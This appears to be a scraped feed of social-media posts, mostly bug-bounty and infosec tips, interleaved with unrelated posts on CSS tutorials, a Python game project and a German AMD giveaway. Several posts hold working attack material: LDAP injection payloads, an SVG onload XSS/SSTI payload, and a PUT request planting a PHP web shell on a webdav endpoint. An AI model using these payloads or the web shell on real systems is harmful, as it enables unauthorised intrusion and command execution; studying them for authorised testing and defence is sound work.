Automate XSS using QuickXSS ! Releasing QuickXSS v2.0.0 🎉🎉 Features : 1. Added gau for better results 2. Header Injection with Blind XSS Payload 3. Installation file to install all tools. 4. Option to store Result. 5. And many more 🤘 github.com/theinfosecguy/… #bugbountytips

Not every research ended with RCEs, but I can promise the bugs (especially the Auth-Bypass) in my #BHUSA talk must be fun and insane! Black Hat

💥 New attack! Our researcher Arseniy Sharoglazov discovered a PHP's Arbitrary Object Instantiation with no user-defined classes. It was turned to RCE! Read the research: swarm.ptsecurity.com/exploiting-arb…

🔥 A tip for getting RCE in Jetty apps with just one XML file!

My favorite bug among the vulnerabilities I presented today! 😆 The original intent was to compare the password. However, the developer copy-and-pasted the code but forgot to replace the variable name. That leads to the Authentication Bypass on IIS.

Animated Circular Progress Bar Using Html CSS Only Watch This : youtu.be/NtSv0xkDDcE All Source Code : patreon.com/onlinetutorials #frontend #FrontEndDevelopment #html #HTML5 #CSS #CSS3 #javascript #webdevelopment #uidesign #webdesign #Coding #100DaysOfCode #onlineTutorials

The last part of A New Attack Surface on MS Exchange - #ProxyRelay is out! Have also left some final thoughts on the Closing part. Hope you all enjoy this journey :D blog.orange.tw/2022/10/proxyr…

Stealing WiFi passwords with XSS and without being connected to the network. By @Elber333 NIce ! #bugbountytips #cybersecurity #infosec

SSTI via XSS working : #bugbountytips #Cybersecurite {{ <svg/onload=prompt("XSS")> }}

LDAP injection payloads 🔥🔥🔥🔥 * *)(& *))%00 )(cn=))\x00 *()|%26' *()|&' *(|(mail=*) *(|(objectclass=*)) *)(uid=*))(|(uid=* admin* admin*)((|userpassword=*) admin*)((|userPassword=*) x' or name()='username' or 'x'='y #bugbounty #infosec

Try this out to get RCE after discovering the hidden `webdav` endpoint: ----START---- [201 Created] PUT /webdav/shell.php HTTP/1.1 Host: site.com Authorization: Basic d2FtcHA6eGFtcHA= <?php system($_GET['cmd']);?> ----STOP---- #infosec #CyberSec #bugbountytips

When you test a Django, Rails, or NodeJs web app try the following payloads in the "Accept:" header. 🥹 Payloads: ⚙️👇 #infosecurity #cybersecuritytips by spidersec

sometimes it's not easy #infosec #cybersecurity #bugbounty #basicauth

#Programming Free Learning Resources #AI #DataSecurity #DataScientist #DataAnalytics #RStat #API #IoT #flutter #javascript #TensorFlow #BigData #Cloud #coding #MachineLearning #FutureOfWork #Technology #DigitalTransformation #CES2023 #MWC23 #5G #Job #100DaysOfCode Coding Master

Just found my first SQL injection on a bug bounty platform. Tip: postgreSQL has a lot of tricks to escalate from SQLi to RCE. Don't stop at the SQLi itself. #bugbountytips #bugbounty #rce #sqli #postgresql #hacking #hacken book.hacktricks.xyz/pentesting-web…

I created a list of CTF machines to practice for OSCP: github.com/bittentech/osc… It includes all the labs I solved from all the major platforms, which made me pass the exam so it might be helpful to you. #infosec #ctf #oscp

Nice list!

Good morning everyone! Today we will continue the rollout of some more OOP principles in Pycraft, and perhaps we will get to start working on the installer as well towards the end! I hope you all have a very successful day :D

I have a question: Would you like to see Tryhackme Machine walkthroughs in the form of videos? With an explanation of how they work? (German)

Entdecke die Wege der Na'vi und werde mit AMD Deutschland zum Helden deiner Geschichte. Zusammen verlosen wir ein 'Special Edition AVATAR: Frontiers of Pandora™' Bundle. Viel Glück! 🍀 🎁 brnw.ch/21wIj3b